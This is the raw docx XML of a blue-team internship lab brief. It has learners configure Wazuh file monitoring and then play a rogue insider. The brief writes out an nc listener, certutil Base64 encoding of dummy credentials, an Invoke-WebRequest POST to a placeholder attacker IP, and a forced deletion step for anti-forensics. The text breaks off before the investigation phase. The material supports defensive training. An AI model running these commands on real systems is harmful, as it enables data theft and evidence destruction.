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09DE4" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CYBERSTER BLUE TEAM INTERNSHIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3235EAE7" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Week 6 Task Brief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598166CD" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Phase One Capstone: Insider Threat Simulation and Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545199DE" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Program: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cyberster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Blue Team Internship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5988B9DB" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phase: </w:t>
      </w:r>
      <w:r>
        <w:t>Phase One — SOC Operations and SIEM Foundations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4EE916" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Track: </w:t>
      </w:r>
      <w:r>
        <w:t>Blue Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0750EBBB" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Week: </w:t>
      </w:r>
      <w:r>
        <w:t>Week 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4670066D" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Submission Due: </w:t>
      </w:r>
      <w:r>
        <w:t>End of Week 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B364DB" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Read this document in full before you begin. This is the capstone simulation for Phase One. It is not a guided walkthrough. The attack commands are provided. The defensive analysis is yours to complete. That asymmetry is intentional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4730F68E" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00BD340D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6F8CFD" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8092DD" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>This week is the culmination of everything you have built and studied in Phase One. You will run a complete attack-and-defend simulation from start to finish, acting as both sides of the engagement. The attack is scripted and provided for you. The defence — detection, forensic analysis, and incident documentation — is entirely your work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458EF0AA" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The scenario is an insider threat. A rogue employee on the Windows endpoint accesses a confidential client database, encodes it to avoid detection, exfiltrates it across the internal network to an attacker-controlled listener, and then attempts to destroy the evidence. Your job as the SOC analyst is to prove all of it happened using the tools and techniques you have spent the last five weeks building.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B3956F" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The week is divided into three phases. Phase One is the red team execution. Phase Two is the blue team investigation. Phase Three is the formal incident response report. All three phases feed into a single submission. The quality of your analysis in Phase Two determines the quality of your report in Phase Three.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F787779" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Weekly Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C46FB" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>To demonstrate end-to-end SOC analyst capability by executing a realistic insider threat scenario, detecting and investigating the attack using File Integrity Monitoring and SIEM tools, decoding exfiltrated evidence using forensic analysis tools, and producing a formal incident response report structured to the NIST SP 800-61 framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8BE5D9" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>By the end of Week 6 you should be able to reconstruct the complete timeline of a multi-stage attack from raw log data alone, map each attacker action to a MITRE ATT&amp;CK technique, write a detection rule that would catch the same attack in future, and communicate your findings in the written format used by professional incident responders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FD876D" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Pre-Engagement Prerequisite: FIM Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D415962" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before executing the attack, you must configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to monitor the staging directory. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> does not monitor temporary or custom folders by default. If you skip this step, no FIM alerts will be generated and your entire investigation will have no log evidence to analyse. Complete this configuration before running any attack commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0ED6F3" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>On your Windows VM, create the following folder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4758F3A8" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:\Espionage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A884388" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> agent configuration file as Administrator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18938789" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:\Program Files (x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>86)\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-agent\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ossec.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6EC33F0D" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Locate the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>syscheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> section and add the following line inside it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5356BCF9" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;directories </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>check_all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">="yes" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>realtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="yes"&gt;C:\Espionage&lt;/directories&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419C81FC" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Save the file and restart the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> agent service via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>services.msc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Confirm the agent is showing as Active in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dashboard before proceeding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C337F1C" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Forgetting to restart the agent after editing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ossec.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is the single most common reason FIM alerts do not appear. The configuration is only loaded at service startup. If you make the change and do not restart, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is still watching the old configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA0117D" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00BD340D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DCBCAB7" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase One: Red Team Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415FF653" w14:textId="77777777" w:rsidR="00725E37" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You are playing the role of a rogue insider with local access to the Windows endpoint. Your objective is to stage a confidential file, encode it to make it unreadable to casual inspection, exfiltrate it to a listener on the Kali VM, and then delete all traces. Each command below triggers specific events in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Execute them one at a time and in order.</w:t>
      </w:r>
      <w:r w:rsidR="001802A3">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00725E37" w:rsidRPr="00725E37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Enable internet if internet isn’t working: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2CB44F" w14:textId="1D898FD7" w:rsidR="00BD340D" w:rsidRDefault="00725E37">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00725E37">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00725E37">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00725E37">
        <w:t>nmcli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00725E37">
        <w:t xml:space="preserve"> device connect eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E0ED8" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 — Start the Attacker Listener (Kali VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5C4DA2" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>On your Kali VM, open a terminal and find your Host-Only IP address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021B1F8A" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pP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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595A2E2" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Start a listener on port 8080. This will wait to receive the exfiltrated data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3896A952" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nc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lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA8AE1" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Leave this terminal open. The listener must be running before you execute the exfiltration command in Step 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDE9647" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2 — Data Staging and Encoding (Windows VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C381900" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open PowerShell as Administrator on the Windows VM. Execute the following commands one at a time. Each one will generate a FIM event in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2414E7" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Create the confidential data file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6642BE27" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Content -Path "C:\Espionage\Client_Database.txt" -Value "CLIENT: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cyberster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | ACCT: 4459 | PW: AdminPassword2026!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2985CF03" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Encode the file to Base64 to obscure its contents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D636EB3" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>certutil.exe -encode "C:\Espionage\Client_Database.txt" "C:\Espionage\system_cache.b64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9A7CE1" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The encoded file is named system_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cache.b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">64, chosen to blend in with legitimate system cache filenames. Both file creation events should now appear in your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> FIM alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B591E3" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3 — Exfiltration (Windows VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA9C9C" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Push the encoded data to the Kali listener. Replace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;KALI_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with your Kali Host-Only IP address from Step 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67470322" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$payload = Get-Content "C:\Espionage\system_cache.b64" -Raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A500FF0" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Uri "http://&lt;KALI_IP&gt;:8080" -Method Post -Body $payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8022D5" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Switch to your Kali terminal. The Base64-encoded content should have arrived in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener output. You will use this in Phase Two to decode the stolen data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC52B82" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4 — Anti-Forensics Cleanup (Windows VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3922E3CF" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The attacker permanently deletes both files to destroy evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A3DEA" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Remove-Item -Path "C:\Espionage\*" -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475F8F2" w14:textId="77777777" w:rsidR="00BD340D" w:rsidRDefault="00000000">
      <w:pPr>
